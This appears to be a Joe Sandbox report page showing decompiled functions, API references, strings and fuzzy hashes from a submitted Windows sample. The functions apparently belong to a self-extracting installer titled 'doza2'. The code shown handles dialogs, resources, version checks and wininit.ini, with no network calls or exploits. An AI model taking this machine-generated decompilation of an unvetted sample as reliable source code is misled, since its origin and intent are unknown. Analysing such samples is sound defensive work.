Instruction ID: e57de408b3f85bc4f8b92cc567276c2474f6d04b58f3ec5ba2619b9cb5330980
Opcode Fuzzy Hash: 34cef6a5a546b334fac7b65d37dafabe7fca2f16954090be01d47ee25951021f
Instruction Fuzzy Hash: 14318471A003289FDB21CF15CD44BAB7778EF45718F0101BAE98AB6290DB349D95CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00403450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E004043D0(_t24, _t12);
					SetWindowTextA(_t24, "doza2");
					SetDlgItemTextA(_t24, 0x838,  *0x409404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0x4091dc = 1;
					goto L8;
				}
				return 0;
			}

0x00403459
0x0040345c
0x004034d8
0x004034de
0x00000000
0x004034e0
0x0040345e
0x00403463
0x0040349a
0x004034a0
0x004034a7
0x004034b2
0x004034c4
0x004034cb
0x00000000
0x004034cb
0x00403468
0x0040346e
0x00403474
0x00000000
0x00000000
0x0040347c
0x0040348c
0x00403490
0x00000000
0x00403496
0x00403484
0x00000000
0x00000000
0x00403486
0x00000000
0x00403486
0x00000000

APIs

EndDialog.USER32(?,?), ref: 00403490
GetDesktopWindow.USER32 ref: 0040349A
SetWindowTextA.USER32(?,doza2), ref: 004034B2
SetDlgItemTextA.USER32(?,00000838), ref: 004034C4
SetForegroundWindow.USER32(?), ref: 004034CB
EndDialog.USER32(?,00000002), ref: 004034D8

Strings

doza2, xrefs: 004034AC

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Window$DialogText$DesktopForegroundItem
String ID: doza2
API String ID: 852535152-612509477
Opcode ID: d838905dce34ad587255487376907b35c9843f6154121b09490ee186a64799e7
Instruction ID: 9f86eaeb99706c3d809457defbd2d1e2bf9a223c622526840d8ada4286a6712c
Opcode Fuzzy Hash: d838905dce34ad587255487376907b35c9843f6154121b09490ee186a64799e7
Instruction Fuzzy Hash: 4601B131240214ABD7165F65DE0C96E3E68EB49702F104036FA46BE6E1CB789F52DB8E

Uniqueness

Uniqueness Score: -1.00%

Function 00402AAC Relevance: 12.1, APIs: 8, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00402AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0x408004; // 0x7980a54a
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0x409a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E00401680(_t65, E004017C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E004065E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E00401680(_t65, E004017C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E00406CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}

0x00402aac
0x00402ab7
0x00402abc
0x00402abe
0x00402ac3
0x00402ac6
0x00402ac9
0x00402ace
0x00402ae6
0x00402bdc
0x00402bdc
0x00402be0
0x00000000
0x00000000
0x00402af2
0x00402afc
0x00402b00
0x00402b05
0x00402b05
0x00402b0b
0x00402bca
0x00402bd1
0x00402b11
0x00402b18
0x00402b26
0x00402b99
0x00402bc8
0x00000000
0x00000000
0x00402b9b
0x00402bae
0x00402bb3
0x00402bb5
0x00402bb5
0x00402bb8
0x00402bb8
0x00402bba
0x00402bbb
0x00000000
0x00402bb8
0x00402b28
0x00402b2e
0x00402b33
0x00402b39
0x00402b3c
0x00402b3c
0x00402b3e
0x00402b3f
0x00402b55
0x00402b5d
0x00402b64
0x00402b64
0x00402b7a
0x00402b7f
0x00402b81
0x00402b81
0x00402b84
0x00402b84
0x00402b86
0x00402b87
0x00402bbf
0x00402bc1
0x00402bc1
0x00402b26
0x00402bda
0x00402bda
0x00402be6
0x00402be6
0x00402bf8

APIs

GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00402AE6
IsDBCSLeadByte.KERNEL32(00000000), ref: 00402AF2
CharNextA.USER32(?), ref: 00402B12
CharUpperA.USER32 ref: 00402B1E
CharPrevA.USER32(?,?), ref: 00402B55
CharNextA.USER32(?), ref: 00402BD4

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
String ID:
API String ID: 571164536-0
Opcode ID: 9ef7d4785946137a81a6c4d03daffc9e4a49267f720d8b09bbae1a799264634a
Instruction ID: 708e6bc04abe071344f259b5c123e55e43d0c35eeaa9831848c96a395a22173b
Opcode Fuzzy Hash: 9ef7d4785946137a81a6c4d03daffc9e4a49267f720d8b09bbae1a799264634a
Instruction Fuzzy Hash: 144102345042855FDB159F308D08ABE7BB99F56304F1400BBE8C2A72C2DAB95E46CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004028E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004028E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				char _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E00402773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t11 =  &_v32; // 0x403938
						_t68 = GetFileVersionInfoSizeA(_v12, _t11);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									_t16 =  &_v32; // 0x403938
									if(GetFileVersionInfoA(_v12,  *_t16, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00402A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00402A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

0x004028f1
0x004028f4
0x004028f7
0x004028f9
0x004028fc
0x004028ff
0x00402901
0x00402907
0x00402a62
0x00402a64
0x0040290d
0x0040290d
0x0040290f
0x00402912
0x00402920
0x00402937
0x00000000
0x00000000
0x0040293d
0x00402944
0x0040294a
0x0040294f
0x00402a2f
0x00402a32
0x00402a34
0x00402a37
0x00402a41
0x00000000
0x00000000
0x00402955
0x0040295e
0x00402962
0x00402969
0x0040296f
0x00402974
0x0040297e
0x0040298c
0x00402a20
0x00402a21
0x00402a27
0x00402a4c
0x00402a4f
0x00402a50
0x00402a53
0x00402a56
0x00402a5c
0x00000000
0x00000000
0x00000000
0x00000000
0x004029b2
0x004029b2
0x004029b5
0x004029bd
0x004029c3
0x004029cc
0x004029d5
0x004029d7
0x004029da
0x004029dd
0x004029df
0x004029ec
0x004029f8
0x004029fc
0x004029ff
0x00402a02
0x00402a07
0x00402a0a
0x00402a0f
0x00402a19
0x00402a81
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402a0f
0x0040298c
0x00402974
0x00402962
0x00000000
0x0040294f
0x00402912
0x00402a65
0x00402a68
0x00402a6c
0x00402a6f
0x00402a6f
0x00402a7d

APIs

GlobalFree.KERNEL32 ref: 00402A6F

Part of subcall function 00402773: CharUpperA.USER32(7980A54A,00000000,00000000,00000000), ref: 004027A8
Part of subcall function 00402773: CharNextA.USER32(0000054D), ref: 004027B5
Part of subcall function 00402773: CharNextA.USER32(00000000), ref: 004027BC
Part of subcall function 00402773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00402829
Part of subcall function 00402773: RegQueryValueExA.ADVAPI32(?,00401140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00402852
Part of subcall function 00402773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00402870
Part of subcall function 00402773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 004028A0

GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00403938,?,?,?,?,-00000005), ref: 00402958
GlobalLock.KERNEL32 ref: 00402969
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00403938,?,?,?,?,-00000005,?), ref: 00402A21
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00403938,?,?), ref: 00402A81

Strings

89@, xrefs: 0040293D, 0040297E, 00402940

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
String ID: 89@
API String ID: 3949799724-2908856592
Opcode ID: 2b24d5433026d87cd8067df8aac39d6b4553280ec6bde926f4b9e96b3cf03a94
Instruction ID: 44ac0b4ed5788b328005fe1e31761a07754ab552c57995065579413dcf6dc051
Opcode Fuzzy Hash: 2b24d5433026d87cd8067df8aac39d6b4553280ec6bde926f4b9e96b3cf03a94
Instruction Fuzzy Hash: 61511A31E00219DBCB21DFA9C988AAEB7B5FF48704F14407AE901B3391DB759A41DF99

Uniqueness

Uniqueness Score: -1.00%

Function 004043D0 Relevance: 10.6, APIs: 7, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004043D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0x408004; // 0x7980a54a
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E00406CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}

0x004043d0
0x004043d8
0x004043df
0x004043e6
0x004043ec
0x004043f1
0x00404400
0x00404403
0x0040440b
0x00404420
0x00404429
0x00404437
0x00404444
0x00404447
0x0040444d
0x00404454
0x0040445b
0x00404460
0x00404461
0x00404467
0x0040446f
0x00404473
0x00404473
0x00404463
0x00404463
0x00404463
0x0040447a
0x00404481
0x00404484
0x0040448a
0x00404492
0x00404496
0x00404496
0x00404486
0x00404486
0x00404486
0x004044b8

APIs

GetWindowRect.USER32(?,?), ref: 004043F1
GetWindowRect.USER32(00000000,?), ref: 0040440B
GetDC.USER32(?), ref: 00404423
GetDeviceCaps.GDI32(00000000,00000008), ref: 0040442E
GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040443A
ReleaseDC.USER32(?,00000000), ref: 00404447
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 004044A2

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: 53cb3f9c8d94e0ba8da14288bef56b7f65c9e83190bda8a924e586b622268b32
Instruction ID: 70268ef729a394680d9897d7bab053961038611fd3359a441dc99da7ee3ef4ca
Opcode Fuzzy Hash: 53cb3f9c8d94e0ba8da14288bef56b7f65c9e83190bda8a924e586b622268b32
Instruction Fuzzy Hash: FA315E72E00219AFCB14CFB8DE889EEBBB5EB89310F154179F905F7280DA346C058B65

Uniqueness

Uniqueness Score: -1.00%

Function 00406298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00406298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0x408004; // 0x7980a54a
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E0040171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0x409124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0x40a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E0040171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E00406CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}

0x00406298
0x004062a0
0x004062a7
0x004062ad
0x004062af
0x004062bb
0x004062c3
0x004062c4
0x0040633b
0x0040633b
0x00406345
0x0040634d
0x00000000
0x00000000
0x004062da
0x004062de
0x0040635f
0x00406369
0x004062e0
0x004062e0
0x004062e0
0x004062e3
0x004062e5
0x004062e5
0x004062e8
0x004062e8
0x004062ea
0x004062eb
0x004062ef
0x004062f1
0x004062f3
0x00406302
0x00406308
0x0040630d
0x00406314
0x00406314
0x00406316
0x00406319
0x00406355
0x00406357
0x0040631b
0x0040631b
0x00406331
0x00406334
0x00406339
0x00000000
0x00406339
0x00406319
0x0040636b
0x0040637d
0x0040637d
0x00000000

APIs

Part of subcall function 0040171E: _vsnprintf.MSVCRT ref: 00401750

LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,004051CA,00000004,00000024,00402F71,?,00000002,00000000), ref: 004062CD
LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,004051CA,00000004,00000024,00402F71,?,00000002,00000000), ref: 004062D4
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,004051CA,00000004,00000024,00402F71,?,00000002,00000000), ref: 0040631B
FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00406345
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,004051CA,00000004,00000024,00402F71,?,00000002,00000000), ref: 00406357

Strings

UPDFILE%lu, xrefs: 004062B3, 00406329

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Resource$Free$FindLoadLock_vsnprintf
String ID: UPDFILE%lu
API String ID: 2922116661-2329316264
Opcode ID: 4b8ed84f8ef8dd9f3ee80327505b0d0b280beef1f62c1a701c66735b5403776f
Instruction ID: dd4f3df3a962844db1ec0a9a12a2e8c46ac7e37050f014d08e7a5875b9a49fb5
Opcode Fuzzy Hash: 4b8ed84f8ef8dd9f3ee80327505b0d0b280beef1f62c1a701c66735b5403776f
Instruction Fuzzy Hash: C2212631A00219ABDB10AF649C459BFBB78EB44714B01413AFD02B3291DB398D228BE9

Uniqueness

Uniqueness Score: -1.00%

Function 00403A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E0040468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0x408d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E0040468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0x408d4c, "<None>") == 0) {
							LocalFree( *0x408d4c);
							L9:
							 *0x409124 = 0;
							return 1;
						}
						_t9 = E00406517(_t19, 0x7d1, 0, E00403100, 0, 0);
						LocalFree( *0x408d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0x409124 = 0x800704c7;
						L2:
						return 0;
					}
					E004044B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0x408d4c);
					 *0x409124 = 0x80070714;
					goto L2;
				}
				E004044B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x409124 = E00406285();
				goto L2;
			}

0x00403a46
0x00403a57
0x00403a5d
0x00403a63
0x00403a6a
0x00403a91
0x00403a9a
0x00403ad8
0x00403b13
0x00403b19
0x00403b1b
0x00000000
0x00403b21
0x00403ae7
0x00403af4
0x00403afc
0x00000000
0x00000000
0x00403afe
0x00403a87
0x00000000
0x00403a87
0x00403aa8
0x00403ab3
0x00403ab9
0x00000000
0x00403ab9
0x00403a78
0x00403a82
0x00000000

APIs

Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
Part of subcall function 0040468F: LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
Part of subcall function 0040468F: memcpy_s.MSVCRT ref: 004046E5
Part of subcall function 0040468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00402F64,?,00000002,00000000), ref: 00403A5D
LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00403AB3

Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554

Part of subcall function 00406285: GetLastError.KERNEL32(00405BBC), ref: 00406285

lstrcmpA.KERNEL32(<None>,00000000), ref: 00403AD0
LocalFree.KERNEL32 ref: 00403B13

Part of subcall function 00406517: FindResourceA.KERNEL32(00400000,000007D6,00000005), ref: 0040652A
Part of subcall function 00406517: LoadResource.KERNEL32(00400000,00000000,?,?,00402EE8,00000000,004019E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00406538
Part of subcall function 00406517: DialogBoxIndirectParamA.USER32(00400000,00000000,00000547,004019E0,00000000), ref: 00406557
Part of subcall function 00406517: FreeResource.KERNEL32(00000000,?,?,00402EE8,00000000,004019E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00406560

LocalFree.KERNEL32(00000000,00403100,00000000,00000000), ref: 00403AF4

Strings

LICENSE, xrefs: 00403A46
<None>, xrefs: 00403AC5

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
String ID: <None>$LICENSE
API String ID: 2414642746-383193767
Opcode ID: aaab1e1078a32d10607d726acafb9d5d89a0e5ddb8b2aa24b25a32d22a887e56
Instruction ID: c2af970f7a243ccd3f2ce706e414ce787b41af5121a45e16be6e15035c564ba5
Opcode Fuzzy Hash: aaab1e1078a32d10607d726acafb9d5d89a0e5ddb8b2aa24b25a32d22a887e56
Instruction Fuzzy Hash: 2D117570301201ABD724AF329E09E1739BDDFD9715B10453FBA45F92F1DA7D88108A6D

Uniqueness

Uniqueness Score: -1.00%

Function 004024E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E004024E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0x408004; // 0x7980a54a
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E0040658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E00406CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}

0x004024e0
0x004024eb
0x004024f2
0x004024f7
0x00402504
0x0040250e
0x0040251d
0x0040252c
0x00402541
0x00402546
0x00402553
0x00402555
0x00402555
0x00402546
0x0040256c

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00402506
WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0040252C
_lopen.KERNEL32(?,00000040), ref: 0040253B
_llseek.KERNEL32(00000000,00000000,00000002), ref: 0040254C
_lclose.KERNEL32(00000000), ref: 00402555

Strings

wininit.ini, xrefs: 00402510

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: e5bfc17c874d528b85d8689bce10905d582a2a6edb60c1a6a67f41529dce9f18
Instruction ID: b90c4bb04f39e14ed539eb2b0743deceed2c1c4aa6b7f5bd2816e63d70cf6699
Opcode Fuzzy Hash: e5bfc17c874d528b85d8689bce10905d582a2a6edb60c1a6a67f41529dce9f18
